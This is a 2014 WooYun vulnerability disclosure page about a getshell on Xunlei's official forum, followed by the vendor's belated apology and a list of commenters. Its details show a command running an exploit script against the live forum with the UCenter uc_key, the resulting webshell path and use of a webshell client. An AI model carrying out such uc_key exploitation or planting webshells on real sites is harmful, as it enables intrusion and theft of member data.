漏洞概要
关注数(24)
关注此漏洞
漏洞标题:迅雷官方论坛后台getshell威胁43W会员数据
相关厂商:迅雷
漏洞作者: 逗比
提交时间:2014-06-05 10:12
修复时间:2014-06-10 10:13
公开时间:2014-06-10 10:13
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2014-06-05: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
root@Adminlm:~/Desktop# python exp.py http://bbs.xunlei.com/ uc_key 你们知道的
webshell:http://bbs.xunlei.com/config/config_ucenter.php
getshell成功
果断就菜刀了
漏洞证明:
修复方案:
版权声明:转载请注明来源 逗比@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-10 10:13
厂商回复:
最新状态:
2014-06-10:@逗比 非常抱歉,工作疏忽,导致在确认期内忘了确认,追加高危。非常感谢您的报告!
漏洞评价:
评论
-
2014-06-05 10:20 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-06-05 12:02 |
MarkGUN ( 路人 | Rank:13 漏洞数:2 | 我是GONG,因为我喜欢一切美好的东西,但是...)
-
2014-06-05 13:03 |
T0XD88 ( 路人 | Rank:0 漏洞数:2 | 会写代码的心理咨询师)
-
2014-06-05 13:19 |
YouYaX(乌云厂商)
-
2014-06-05 13:21 |
蓝颜 ( 实习白帽子 | Rank:42 漏洞数:29 )
-
2014-06-05 14:13 |
doosit ( 路人 | Rank:18 漏洞数:4 | 木有介绍。)
-
2014-06-05 14:27 |
迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)
-
2014-06-05 18:53 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-06-05 18:53 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
@YouYaX 耶,厂商也这么有时间,来看漏洞啊!
-
2014-06-05 19:40 |
YouYaX(乌云厂商)
-
2014-06-05 20:06 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-06-07 00:23 |
小豹 ( 实习白帽子 | Rank:33 漏洞数:8 | 一个人的寂寞,整个群的错234236)
-
2014-06-07 08:26 |
逗比 ( 路人 | Rank:20 漏洞数:6 | 逗比的年代,诶油我艹)
-
2014-06-10 10:38 |
铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
-
2014-06-10 11:13 |
小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)
-
2014-06-10 11:23 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-06-10 11:24 |
蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)
-
2014-06-10 13:18 |
博丽灵梦 ( 路人 | Rank:13 漏洞数:7 | = =cf)
@逗比 非常抱歉,工作疏忽,导致在确认期内忘了确认,追加高危。非常感谢您的报告!看了这个笑了老半天 逗比....哈哈哈
-
2014-06-10 14:29 |
ieasyi ( 路人 | Rank:3 漏洞数:2 )
-
2014-06-11 01:03 |
Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)
逗比 非常抱歉,工作疏忽,导致在确认期内忘了确认,追加高危。非常感谢您的报告!哈哈哈哈哈
-
2014-06-11 15:45 |
黑名单 ( 实习白帽子 | Rank:60 漏洞数:13 | 像个傻瓜似的,为什么。)
@逗比 非常抱歉,工作疏忽,导致在确认期内忘了确认,追加高危。非常感谢您的报告!看了这个笑了老半天 逗比 狂A逗比@逗比
-
2014-06-14 12:37 |
微涼 ( 路人 | Rank:4 漏洞数:3 )
-
2014-07-16 14:21 |
0x01 ( 路人 | Rank:2 漏洞数:1 | XXOO)
-
2014-10-02 11:27 |
ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)